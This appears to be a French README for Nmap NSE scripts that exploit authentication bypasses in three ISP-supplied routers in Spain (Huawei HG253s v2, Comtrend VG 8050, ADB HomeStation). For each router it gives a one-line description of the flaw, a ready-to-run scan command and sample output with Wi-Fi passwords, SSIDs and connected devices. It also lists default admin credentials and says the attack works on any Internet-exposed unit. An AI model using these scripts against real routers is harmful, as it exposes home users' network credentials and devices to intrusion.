
Quelques scripts NSE pour rechercher des informations sur les routeurs
Des scripts NSE pour rechercher des informations sur des routeurs.
L'auteur de ces scripts est VicenDominguez. Il a trouvé le 0-Day sur Huawei, je l'ai seulement modifié pour deux autres.
L'auteur de ce script n'est pas responsable de son utilisation.
#Huawei HG253s v2 Vodafone-Espagne commence à louer un nouveau routeur Huawei HG253v2 à ses clients espagnols. Ce nouveau routeur est livré avec une nouvelle version du firmware.
##Vulnérabilité En gros, il ne valide pas le cookie de session dans certaines pages d'administration. Il est donc possible d'obtenir directement des informations à partir de ces URL sur n'importe quel routeur ouvert à Internet.
##Utilisation
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX
#Comtrend VG 8050 Telefonica-Espagne commence à louer un nouveau routeur Comtrend VG 8050 à ses clients espagnols. Ce nouveau routeur est livré avec une nouvelle version du firmware. Ce bug a été trouvé par DaniLabs
##Vulnérabilité En gros, il ne valide pas le cookie de session dans certaines pages d'administration. Il est donc possible d'obtenir directement des informations à partir de ces URL sur n'importe quel routeur ouvert à Internet.
##Utilisation
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
#ADB P.DGA4001N alias HomeStation Telefonica-Espagne commence à louer un nouveau routeur ADB P.DGA4001N à ses clients espagnols. Ce nouveau routeur est livré avec une nouvelle version du firmware. Ce bug a été trouvé par DaniLabs
##Vulnérabilité En gros, il ne valide pas le cookie de session dans certaines pages d'administration. Il est donc possible d'obtenir directement des informations à partir de ces URL sur n'importe quel routeur ouvert à Internet.
Les identifiants par défaut sont admin / 1234 ##Utilisation
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X